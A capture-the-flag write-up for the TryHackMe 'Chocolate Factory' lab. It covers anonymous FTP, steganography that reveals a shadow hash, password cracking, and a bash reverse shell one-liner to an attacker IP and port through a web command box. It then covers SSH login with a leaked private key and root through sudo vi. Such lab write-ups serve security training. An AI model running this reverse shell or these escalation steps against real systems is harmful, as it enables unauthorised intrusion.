Featured image of post Charlie and the Chocolate Factory
Box

Charlie and the Chocolate Factory

THM Chocolate Factory box writeup

I enjoyed watching this movie when I was a kid. This box is made with the theme from the movie Charlie and the Chocolate Factory. Thanks to AndyInfosec team for creating this fun box and reminding me of a good old memories.

Now itā€™s time to take over the chocolate factory :)

Enumeration

Target IP: 10.10.255.29

Starting with the port scanning.

IDENT

We see many ports opened, and one of them, 113, runs ā€œidentā€ protocol.

What is ident?

Modern day routers, even the cheap ones, they all contain the functionality to block this port. This port should not be allowed to people in general.

Letā€™s see what information we can retrieve.

From the nmap scan, we know that the target is running web server, so this might be useful later on when investigating the web.

Lets check other ports as well.

This is what we got from the port 100. For those of you who forgot the characters in the movie, Mr. Wonka, or Willy Wonka, is the owner of the chocolate factory and Augustus is this boy. All the other ports above 100 returns this message except the port 125.

FTP

Letā€™s see if this server allows anonymous access.

Yes it does.

List the content and download.

There is a file called gum_room.jpg.

Gum room

And this is the photo.

Investigate if anything is hidden in this jpg file.

  • binwalk
  • strings
  • stegseek

We got something from the stegseek.

Check out the content.

We got a base64 string. Run the following command below.

1

 cat gum_room.jpg.out | base64 -d > decrypted.txt

And we got a shadow file that contains the Charlieā€™s password in sha512crypt hash.

1
2

--SNIPP--
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::

John comes into play. We donā€™t need to specify the format becaus JTR automatically recognizes it as sha512crypt.

Save the charlieā€™s shadow info in the file named hash.

Now we can bruteforce.

We got charlieā€™s password.

HTTP

Open the web browser and check the website.

We got a web page with the login form.

Letā€™s check what we got from IDENT port. (http://localhost/key_rev_key)

In the web browser, type http://10.10.255.29/key_rev_key and we get a file called key_rev_key.

It is a ELF 64-bit file. Letā€™s run it.

It doesnā€™t like my name.

Letā€™s do simple investigation on what libraries and functions this executable is calling.

Looks like this program is written in C and calls ā€œprintfā€, ā€œscanfā€, ā€œputsā€, and ā€œstrcmpā€.

It also leaks the string value that my name is being compared to. laksdhfas.

Letā€™s rerun it with the name laksdhfas.

We got a key, but donā€™t know yet where itā€™s gonna be used.

Foothold & User flag

ā€œWhile I was writing this post, machine time expired, so I restarted a machine and got new target IP: 10.10.124.206ā€

We have charlieā€™s password from the FTP section. Letā€™s login.

Since the credential came from the shadow file, I thought it is obviously the ssh credential, but wasnā€™t true. One more place we could use this is the login form in the web.

Login was successful and we are now in the squirrel room. This room let us execute commands.

Setup a listener

Payload

/bin/bash -c "bash -i >& /dev/tcp/10.2.19.132/7777 0>&1"

Execute it.

And we are in.

Lateral Movement

Navigate to user charlieā€™s home directory and we see some interesting files.

The content of teleport.pub

The content of teleport

This is the ssh private key with the weak permission set.

Letā€™s login to charlieā€™s account using this private key. Copy the key into a file named ā€˜id_rsaā€™ and give it a 600 permission.

ssh -i id_rsa charlie@10.10.124.206

We are now charlie.

We got a user flag.

Privesc & Root flag

Letā€™s first check if charlie has any sudo privilege.

This is going to be really simple privesc. We can run vi editor in rootā€™s privilege without charlieā€™s password (good thing because we donā€™t know charlieā€™s password).

Execute sudo /usr/bin/vi

And we are now in a default vi editor.

Type :!bash

Enter

We got root shell.

Navigate to the rootā€™s home directory and instead of a flag, we see a python script called root.py.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

from cryptography.fernet import Fernet
import pyfiglet
key=input("Enter the key:  ")
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
dcrypt_mess=f.decrypt(encrypted_mess)
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)
print(mess)

The content of root.py

We already have a key from the binary key_rev_key.

bā€™-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=ā€™

So, we can fix this code since that way, itā€™s easier to pass the byte string to the key variable. Also, the original code yields some errors.

Modified code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

from cryptography.fernet import Fernet
import pyfiglet
#key=input("Enter the key:  ") << change this
key = b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' # to this
f=Fernet(key)
encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
#dcrypt_mess=f.decrypt(encrypted_mess) << change this
dcrypt_mess=f.decrypt(encrypted_mess.encode()) # to this. f.decrypt(token) << token has to be in byte format
mess=dcrypt_mess.decode()
display1=pyfiglet.figlet_format("You Are Now The Owner Of ")
display2=pyfiglet.figlet_format("Chocolate Factory ")
print(display1)
print(display2)
print(mess)

Run root.py

You are now the owner of chocolate factory

And we got a root flag.

Chocolate Factory pwned.

Ā© 2020 - 2023 Jin's Exploit Repo
Built with Hugo
Theme Stack designed by Jimmy